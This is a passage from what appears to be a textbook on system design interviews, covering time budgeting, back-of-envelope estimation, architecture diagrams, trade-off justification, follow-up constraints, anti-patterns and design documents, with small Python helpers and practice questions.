A system design discussion is not a quiz with a correct answer; it is a simulation of a design meeting, and it is assessed on how you navigate ambiguity, justify choices, and manage scope. The most common failure is not ignorance — it is spending thirty minutes on a beautiful database schema and never reaching the part of the system that was actually hard. A time budget prevents that, in the same way a latency budget prevents one service consuming the whole request (13.1.1).
The framework is a sequence, and the discipline is finishing each step before moving on.
45-MINUTE DESIGN DISCUSSION
+------+------------------------+---------------------------------------------+
| Time | Phase | What you must produce |
+------+------------------------+---------------------------------------------+
| 5m | Requirements | 3-5 functional bullets, 3-4 non-functional; |
| | clarification | ONE sentence stating what is out of scope |
| 5m | Scale estimation | QPS, storage, bandwidth — and the ONE |
| | | number that drives the architecture |
| 5m | API + data model | 3-4 endpoints, core entities, access |
| | | patterns (the queries decide the store) |
| 10m | High-level design | Boxes and arrows end to end; the request |
| | | path traced aloud for one operation |
| 15m | Deep dive | The 1-2 genuinely hard parts, in detail |
| 5m | Bottlenecks + wrap | What breaks at 10x, what you would monitor |
+------+------------------------+---------------------------------------------+
If you are at 20 minutes with no boxes drawn, you are behind. State that you
are moving on and move on — the interviewer wants to see you manage the clock.
Requirements first, always. The single highest-value five minutes is spent narrowing the problem, because "design Twitter" has no answer while "design the feed for 300M users with a 200 ms read budget, ignoring DMs and search" does. Ask about scale, read/write ratio, consistency needs, and latency targets — then state explicitly what you are excluding, which shows judgement rather than omission.
# The estimation habit worth memorizing: convert to per-second, then to bytes.
def back_of_envelope(daily_active_users: int, actions_per_user: int,
bytes_per_action: int, read_write_ratio: int,
peak_multiplier: float = 3.0):
writes_per_day = daily_active_users * actions_per_user
write_qps = writes_per_day / 86_400
return {
"write_qps_avg": round(write_qps),
"write_qps_peak": round(write_qps * peak_multiplier),
"read_qps_peak": round(write_qps * read_write_ratio * peak_multiplier),
"storage_per_day_gb": round(writes_per_day * bytes_per_action / 1e9, 1),
"storage_5y_tb": round(writes_per_day * bytes_per_action * 365 * 5 / 1e12, 1),
}
print(back_of_envelope(300_000_000, 2, 1_000, read_write_ratio=100))
# {'write_qps_avg': 6944, 'write_qps_peak': 20833, 'read_qps_peak': 2083333,
# 'storage_per_day_gb': 600.0, 'storage_5y_tb': 1095.0}
# The read QPS is the number that dictates the architecture here — say so, and
# let the rest of the design follow from it.
Numbers matter less for their precision than for what they rule out. Two million reads per second immediately implies caching and CDN tiers, and rules out a single database. Say that consequence out loud — the estimate exists to justify a decision, and an estimate you do not use is wasted time.
Driving the conversation is part of the assessment. Narrate your reasoning ("I am choosing a queue here because the write burst is 50x the average"), offer the trade-off before being asked, and check in at phase boundaries ("that is the high-level design — shall I go deep on the fan-out, or would you rather discuss storage?"). Silence while thinking is fine if you announce it; ten minutes of silent drawing is not.
Key Takeaways
- Budget the time explicitly and move on at each boundary, even mid-thought.
- Spend the first five minutes narrowing scope and stating what is excluded.
- Estimate to justify a decision — name the one number that drives the architecture.
- Design the API and access patterns before choosing a datastore.
- Reserve a third of the time for the genuinely hard part.
- Narrate reasoning and check in at phase boundaries; do not design in silence.
🧪 Practice
- Write the requirements-clarification questions you would ask for "design a food delivery app", limited to eight.
- Do the back-of-envelope for 50M daily users posting twice a day at 2 KB, with a 50:1 read ratio, and state which number drives the design.
- Interview: You are 25 minutes in and have not drawn the architecture. What do you do? (Hint: the recovery is a explicit act of scope management, not faster talking.)
Drawing Effective Architecture Diagrams
A diagram is a compression format for a design. A good one lets someone follow a request through the system without narration; a bad one is a bag of labelled rectangles that requires the author standing next to it. The difference is almost entirely about whether the arrows carry meaning and whether the boxes are at one level of abstraction.
One diagram, one level. The single most common flaw is mixing altitudes — a
box labelled "Kubernetes" beside a box labelled "the parseUserToken() helper".
The C4 model is a useful discipline: context (systems and external actors),
container (deployable units and datastores), component (major pieces inside one
container), and code (rarely worth drawing). Pick a level and stay there; drop a
level only in a separate diagram.
Arrows are the information. An unlabelled arrow says only "these are connected", which the reader had probably assumed. A labelled arrow says what flows, in which direction, by what protocol, and whether it is synchronous.
WEAK STRONG
+------+ +------+ +----------+ POST /orders (sync, 50ms)
| app |---->| db | | client |------------------------+
+------+ +------+ +----------+ |
| v
v +---------------------------------------+
+-------+ | order-service (3 replicas, stateless) |
| cache | +----+--------------------+-------------+
+-------+ | SQL (sync) | publish (async)
v v
Everything is a box. Nothing says +-------------+ +--------------+
what flows, what is synchronous, | orders DB | | order.created|
or what happens when a box dies. | (Postgres, | | (Kafka, 7d) |
| sharded x4) | +------+-------+
+-------------+ |
v
+--------------+
| fulfilment, |
| email, search|
+--------------+
Four conventions do most of the work:
- Solid arrow = synchronous call; dashed = asynchronous/event. This one distinction answers most "what happens if it is down?" questions before they are asked.
- Label every edge with protocol and the operation, not just a technology name.
- Annotate boxes with the property that matters — replica count, shard count, whether it is stateful, retention.
- Left to right, or top to bottom, following the request. A reader should be able to trace the primary flow without their eye jumping backwards.
For whiteboards and interviews specifically: draw the happy path first and get agreement on it before adding replication, caching, and failure handling. Layering detail onto an agreed skeleton reads as structured thinking; drawing everything at once reads as noise. Use numbered steps (1, 2, 3) along the primary flow when the order is not visually obvious, and keep a legend if you use more than two line styles.
Finally, draw the failure story somewhere. A design diagram that only shows the happy path hides exactly the parts reviewers most need to evaluate: what is replicated, what is queued, what degrades, and what has a fallback. That can be annotation on the main diagram or a second one, but it should exist.
Key Takeaways
- Keep one diagram at one level of abstraction; C4 is a useful ladder.
- Arrows carry the information: label protocol, operation, and direction.
- Distinguish synchronous from asynchronous visually — it answers most failure questions implicitly.
- Annotate boxes with the property that matters: replicas, shards, retention, statefulness.
- Lay the diagram out along the request flow, and number the steps.
- Draw the happy path first, then layer on failure handling.
- A diagram with no failure story hides what reviewers most need to see.
🧪 Practice
- Redraw a system you know at the container level, labelling every arrow with protocol and synchronicity.
- Take an existing diagram and mark every place where two levels of abstraction are mixed.
- Interview: Draw the read path for a cached, sharded service and mark what happens on a cache miss and on a shard failure. (Hint: the failure paths are additional arrows from existing boxes, not new boxes.)
Justifying Trade-offs Out Loud
The claim that separates a senior design from a junior one is not "I chose Cassandra" but "I chose Cassandra because the write rate is 200k/s and I can accept eventual consistency for this data, giving up multi-row transactions, which this workload does not need." Every meaningful architectural decision costs something; a design presented as free is a design that has not been thought through, and reviewers read the absence of trade-offs as inexperience rather than as elegance.
The structure of a defensible claim has four parts, and stating them in order takes about fifteen seconds:
1. DECISION "I will fan out the feed at write time..."
2. BECAUSE "...because reads outnumber writes 100:1 and read latency is the
product requirement."
3. GIVING UP "This costs write amplification — one post becomes 300 writes —
and makes deletion expensive."
4. BOUNDARY "It breaks down above ~100k followers, so celebrities are handled
by read-time merge instead."
Part 4 is what distinguishes analysis from recitation: knowing WHERE your own
choice stops working is the strongest signal you can give.
Name the axis you are trading on. Most architectural decisions move along one of a small number of well-known axes, and naming the axis makes the discussion concrete rather than aesthetic:
| Axis | Buying | Paying with |
|---|---|---|
| Consistency vs availability | Correctness under partition | Uptime, or higher latency |
| Latency vs cost | Speed (cache, CDN, replicas) | Money, staleness, complexity |
| Read vs write optimization | Fast reads (precompute) | Write amplification, storage |
| Normalization vs duplication | Update simplicity | Join cost at read time |
| Sync vs async | Immediate feedback | Coupling, tail latency |
| Simplicity vs flexibility | Fewer failure modes | Rework when requirements shift |
Quantify wherever you can. "Caching will help" is an opinion; "a 95% hit rate turns 200k reads/second into 10k database reads/second, which one primary can serve" is an argument. Rough numbers used to support a decision are far more persuasive than precise numbers used decoratively.
def justify_cache(read_qps: int, hit_rate: float, db_capacity_qps: int):
"""Turn a hand-wave into a defensible claim — and notice when it fails."""
db_load = read_qps * (1 - hit_rate)
return {
"db_qps_without_cache": read_qps,
"db_qps_with_cache": round(db_load),
"within_capacity": db_load <= db_capacity_qps,
# The sentence that shows you understand the failure mode, not just the
# happy path: what does a cold or failed cache do to the database?
"cold_cache_risk": f"{read_qps // db_capacity_qps}x over capacity "
f"if the cache is empty",
}
print(justify_cache(read_qps=200_000, hit_rate=0.95, db_capacity_qps=15_000))
# {'db_qps_without_cache': 200000, 'db_qps_with_cache': 10000,
# 'within_capacity': True, 'cold_cache_risk': '13x over capacity if the cache
# is empty'}
Handle disagreement as analysis, not defence. When someone challenges a choice, the productive response identifies the assumption the disagreement rests on: "That works if writes stay under 10k/s — do you expect them higher?" If the challenge is right, change the design and say why, which reads as strength rather than concession. If you genuinely do not know something, say so and state how you would find out; inventing a number is the one move that ends the credibility of everything else you said.
Finally, avoid absolutes. "SQL does not scale" and "microservices are always better" are both false and both signal shallow familiarity. The honest form is conditional: it scales to this point, under these access patterns, at this cost.
Key Takeaways
- State decision, reason, cost, and breaking point — the breaking point is the strongest signal.
- Name the axis you are trading on; it turns aesthetics into engineering.
- Quantify claims: rough numbers supporting a decision beat precise numbers used as decoration.
- Treat challenges as a search for the disagreeing assumption, and change your mind visibly when the challenge is right.
- Say "I do not know, here is how I would find out" rather than inventing facts.
- Avoid absolutes; every scaling claim is conditional on access pattern and cost.
🧪 Practice
- Write four-part justifications for three decisions in a system you have built, including each one's breaking point.
- Take a decision you made by default and argue the opposite case as convincingly as you can.
- Interview: An interviewer says "why not just use Postgres for all of this?" Respond. (Hint: the strong answer usually starts by agreeing further than expected, then identifying the specific workload property that eventually breaks it.)
Handling Follow-Up Constraints
Design conversations do not end at the first working design; they continue with "now it needs to be globally available", "now the write rate is 50x", or "now this data is regulated". These are not attempts to invalidate your work. They test whether you understand your own design well enough to know which part breaks first, and whether you can extend it rather than restart.
The response pattern is diagnostic, not architectural. Before proposing anything, identify what the new constraint actually breaks. Most follow-ups invalidate exactly one assumption, and locating it converts a vague "redesign everything" into a bounded change.
RESPONDING TO A NEW CONSTRAINT
1. RESTATE "So we need to serve users in Europe with the same 200 ms
budget, and data must stay in the EU."
2. LOCATE "That breaks two things: the single-region database — a
cross-Atlantic round trip is 80-140 ms on its own — and the
assumption that any replica may hold any user's data."
3. OPTIONS "Two directions: read replicas per region with writes still
centralised, or full regional sharding by user residency."
4. RECOMMEND "I would shard by residency: it satisfies the legal constraint
outright, and cross-region access is rare for this workload."
5. CONSEQUENCE "It costs us global aggregate queries, which now need an
offline pipeline, and migrating a user between regions
becomes an explicit operation."
Skipping step 2 is what produces panicked redesigns of components that were
never affected.
The common follow-ups and where they land are worth knowing in advance, because they recur across almost every design:
| Follow-up | First thing it breaks | Usual direction |
|---|---|---|
| "10x the traffic" | The single-writer or hottest partition | Shard the hot key; add async paths |
| "Make it globally available" | Cross-region latency and data residency | Regional shards, or replicas + local reads |
| "Now it must be strongly consistent" | Caches and async replication | Move consistency to one boundary, not all |
| "The dependency is down" | Synchronous coupling | Circuit breakers, queues, degraded modes |
| "Data must be deletable (GDPR)" | Denormalized copies and derived stores | Reference indirection, crypto-shredding |
| "Halve the cost" | Over-provisioned always-on capacity | Tiering, autoscaling, sampling |
Scale increases deserve a specific habit: work out which component saturates first rather than scaling everything. A 10x traffic increase usually breaks one thing — a single database primary, a hot partition, a synchronous fan-out — and the useful answer names it, then proposes the targeted change and what it costs.
Constraint conflicts should be surfaced, not silently resolved. If asked for strong consistency, global availability, and partition tolerance simultaneously, the correct response is to say that all three cannot hold at once (3.x) and to ask which one bends — usually by identifying the small subset of operations that truly need strong consistency (payments, inventory) while the rest tolerate eventual consistency. That framing turns an impossible request into a scoped design.
Finally, when a follow-up genuinely does invalidate the design, say so plainly. "That changes the fundamental shape — with strict per-user data residency I would not build a single global cluster at all, I would build regional stacks with a thin routing layer" is a much stronger answer than patching a design you no longer believe in.
Key Takeaways
- Locate what the constraint breaks before proposing changes; usually it is one assumption, not the whole design.
- Restate the constraint to confirm you are solving the right problem.
- Offer two options with a recommendation and its consequence, rather than one answer or an unranked list.
- For scale increases, identify the component that saturates first instead of scaling uniformly.
- Apply strong consistency to the narrow set of operations that need it, not the whole system.
- Surface conflicting constraints explicitly and ask which one bends.
- If a constraint genuinely invalidates the design, say so instead of patching.
🧪 Practice
- Take a design from this chapter and work through what breaks first at 10x, then at 100x.
- Add a data-residency requirement to one design and list every component that must change.
- Interview: "Now make it work offline." Respond for a note-taking app. (Hint: identify which operations can be queued locally, and what happens when two devices queued conflicting operations.)
Common Design Anti-Patterns
Most weak designs fail in a small number of recognisable ways, and the patterns repeat across products and experience levels. Learning to spot them in your own work is faster than learning every good pattern, because avoiding these removes most of the risk on its own.
Premature distribution. Splitting into microservices, sharding a database, or adding a message bus before there is a load or organizational problem that requires it buys distributed-systems failure modes — partial failures, eventual consistency, distributed debugging — in exchange for nothing. A single well-indexed Postgres instance on modern hardware serves tens of thousands of queries per second and holds terabytes; most systems never outgrow it. Design for 10x current scale, not 1000x.
Ignoring failure. A design that only describes the happy path is incomplete, because every remote call has at least four outcomes — success, failure, timeout, and ambiguity — and the fourth is the one that corrupts state (15.4.1). The question "what happens when this dependency is slow?" should be answered for every arrow in the diagram, and the answer must not be "we wait".
THE ANTI-PATTERN CHECKLIST
[ ] Single point of failure with no failover path
[ ] Synchronous call chain > 3 deep (latency and failure both multiply)
[ ] No timeout, or a timeout longer than the caller's own budget
[ ] Retries without exponential backoff and jitter (retry storms, 13.3)
[ ] Unbounded queue or unbounded in-memory collection
[ ] Cache with no stampede protection and no TTL jitter
[ ] A hot key or hot partition nobody has looked for
[ ] Non-idempotent write behind an at-least-once delivery path
[ ] Offset/page-number pagination over data that changes
[ ] Money in floating point
[ ] Distributed transaction where a saga or idempotent retry would do
[ ] Analytics query running against the production OLTP primary
[ ] Metrics labelled with unbounded-cardinality values
[ ] "We'll add monitoring later"
Chatty synchronous chains. Service A calls B, which calls C, which calls D, all synchronously. Latency adds, availability multiplies (four services at 99.9% each give 99.6% combined), and one slow dependency stalls the whole chain. The fixes are structural: collapse the chain, parallelize independent calls, or make the tail asynchronous through an event.
The unbounded everything. Unbounded queues turn a temporary slowdown into an out-of-memory crash and hide backpressure until it is too late; unbounded result sets work in development and time out in production; unbounded retries amplify an outage into an outage-plus-retry-storm. Every buffer, page, and retry loop needs an explicit limit and a defined behaviour when it is reached.
Consistency theatre. Two opposite errors, equally common: demanding strong consistency everywhere, which forces coordination onto paths that never needed it and destroys availability; and assuming eventual consistency is harmless everywhere, which produces double-charged customers and oversold inventory. The discipline is to identify the specific operations where a stale read causes real harm, spend the coordination there, and be explicit that everything else is eventually consistent.
Resume-driven design. Choosing a technology for its novelty rather than for the workload — a graph database for a system with no traversals, Kubernetes for three services, a streaming platform for a nightly job. The tell is a design where the justification is a property of the technology rather than a requirement of the system.
Key Takeaways
- Distribute only when load or organizational structure forces it; design for 10x, not 1000x.
- Every remote call has four outcomes, and ambiguity is the dangerous one.
- Deep synchronous chains multiply both latency and failure probability.
- Bound every queue, page, retry, and in-memory collection explicitly.
- Spend consistency where staleness causes real harm; be explicit that the rest is eventual.
- Never put money in floats or analytics on the OLTP primary.
- Choose technology from the workload, not from the technology's properties.
🧪 Practice
- Run the checklist above against a system you work on and list every item it fails.
- Take a synchronous four-service chain and redesign it to two hops plus an event, stating what becomes eventually consistent.
- Interview: A candidate proposes microservices, Kafka, and Kubernetes for a product with 100 users. What do you say? (Hint: the useful critique is about which specific problem each component was intended to solve, not about the components themselves.)
Writing a Design Document
An interview lasts an hour; a design document lasts for years. It is the artefact that gets a design reviewed before it is built, records why decisions were made for the people who inherit them, and turns a discussion involving five people into one that scales to fifty. Writing it is also the most reliable way to discover that a design does not actually work — vagueness survives conversation but not prose.
Structure follows the reader's questions, and most readers will read only the first page, so the document must front-load the answer:
DESIGN DOCUMENT STRUCTURE
1. Summary 3-5 sentences: what, why, and the chosen approach.
Written LAST, read FIRST, and by most readers ONLY.
2. Context & problem What exists today, what is wrong, why now. Include the
evidence — metrics, incidents, requests — not adjectives.
3. Goals / non-goals Explicit scope. Non-goals prevent the review from
expanding into everything the system could ever do.
4. Requirements Functional plus measurable non-functional targets
("p99 < 200 ms at 50k rps"), not "must be fast".
5. Proposed design Architecture, data model, APIs, request flows, failure
behaviour, migration path.
6. Alternatives 2-3 real options with why each was rejected. This is the
section reviewers judge the document by.
7. Risks & unknowns What could go wrong, what you have not resolved, and
what would change your mind.
8. Rollout & ops Migration, feature flags, monitoring, rollback plan,
and the cost estimate.
9. Open questions Explicit asks, each with a named owner.
The alternatives section carries the most weight. A document with one design reads as a decision already made and invites only superficial comments; a document with three options and clear reasoning invites engagement with the reasoning. Each alternative needs to be presented as genuinely plausible — a straw man that was obviously never considered damages credibility more than omitting the section.
ALTERNATIVES, WRITTEN WELL
Option A: Fan-out on write (CHOSEN)
+ O(1) reads, which is the product requirement
- 300 writes per post; celebrity posts need a separate path
Chosen because reads outnumber writes 100:1 and read latency is the SLO.
Option B: Fan-out on read
+ O(1) writes, trivially handles celebrities, no fan-out storage
- Read latency scales with following count; p99 measured at 900 ms in a
prototype against 400 followed accounts
Rejected: fails the 200 ms read SLO at the 90th percentile of following count.
Option C: Buy a managed feed service
+ Fastest to ship, no operational burden
- $340k/year at our volume; ranking is not customisable
Rejected on cost and on the ranking requirement, not on capability.
Note that B and C are rejected with NUMBERS and against STATED requirements.
"Too slow" and "too expensive" are not reasons; they are conclusions.
Write for the reader who arrives in two years. That reader needs the constraints that applied at the time — traffic, team size, deadlines, what the alternatives cost — because without them every decision looks arbitrary or stupid. Record the context that made the choice reasonable, and record what you would need to see to revisit it. A short "revisit this if X" line is one of the highest-value sentences in any design document.
Keep it proportional and reviewable. A two-page document that gets read beats a twenty-page one that does not. Use diagrams instead of paragraphs describing diagrams, tables for comparisons, and concrete numbers throughout. Circulate it asynchronously before any meeting so the meeting resolves disagreements rather than transmitting information, and record the outcome of that discussion in the document itself — including the objections that were raised and not adopted, which is exactly the context the future reader will want.
Key Takeaways
- Front-load the summary: most readers read only the first page.
- State non-goals explicitly to keep the review bounded.
- Make non-functional requirements measurable, not adjectival.
- The alternatives section is what reviewers judge; present each option fairly and reject it with numbers against stated requirements.
- Record the constraints and context that made the decision reasonable at the time, plus what would justify revisiting it.
- Include rollout, monitoring, rollback, and cost — a design without an operational plan is incomplete.
- Circulate before the meeting and record the discussion's outcome in the document.
🧪 Practice
- Write the summary and goals/non-goals sections for a change you are currently working on, in under 300 words.
- Take a decision already made in your codebase and write the alternatives section that should have accompanied it.
- Interview: A reviewer says your document is "too long to read". How do you respond? (Hint: think about what the first page is currently doing, and who each subsequent section is actually written for.)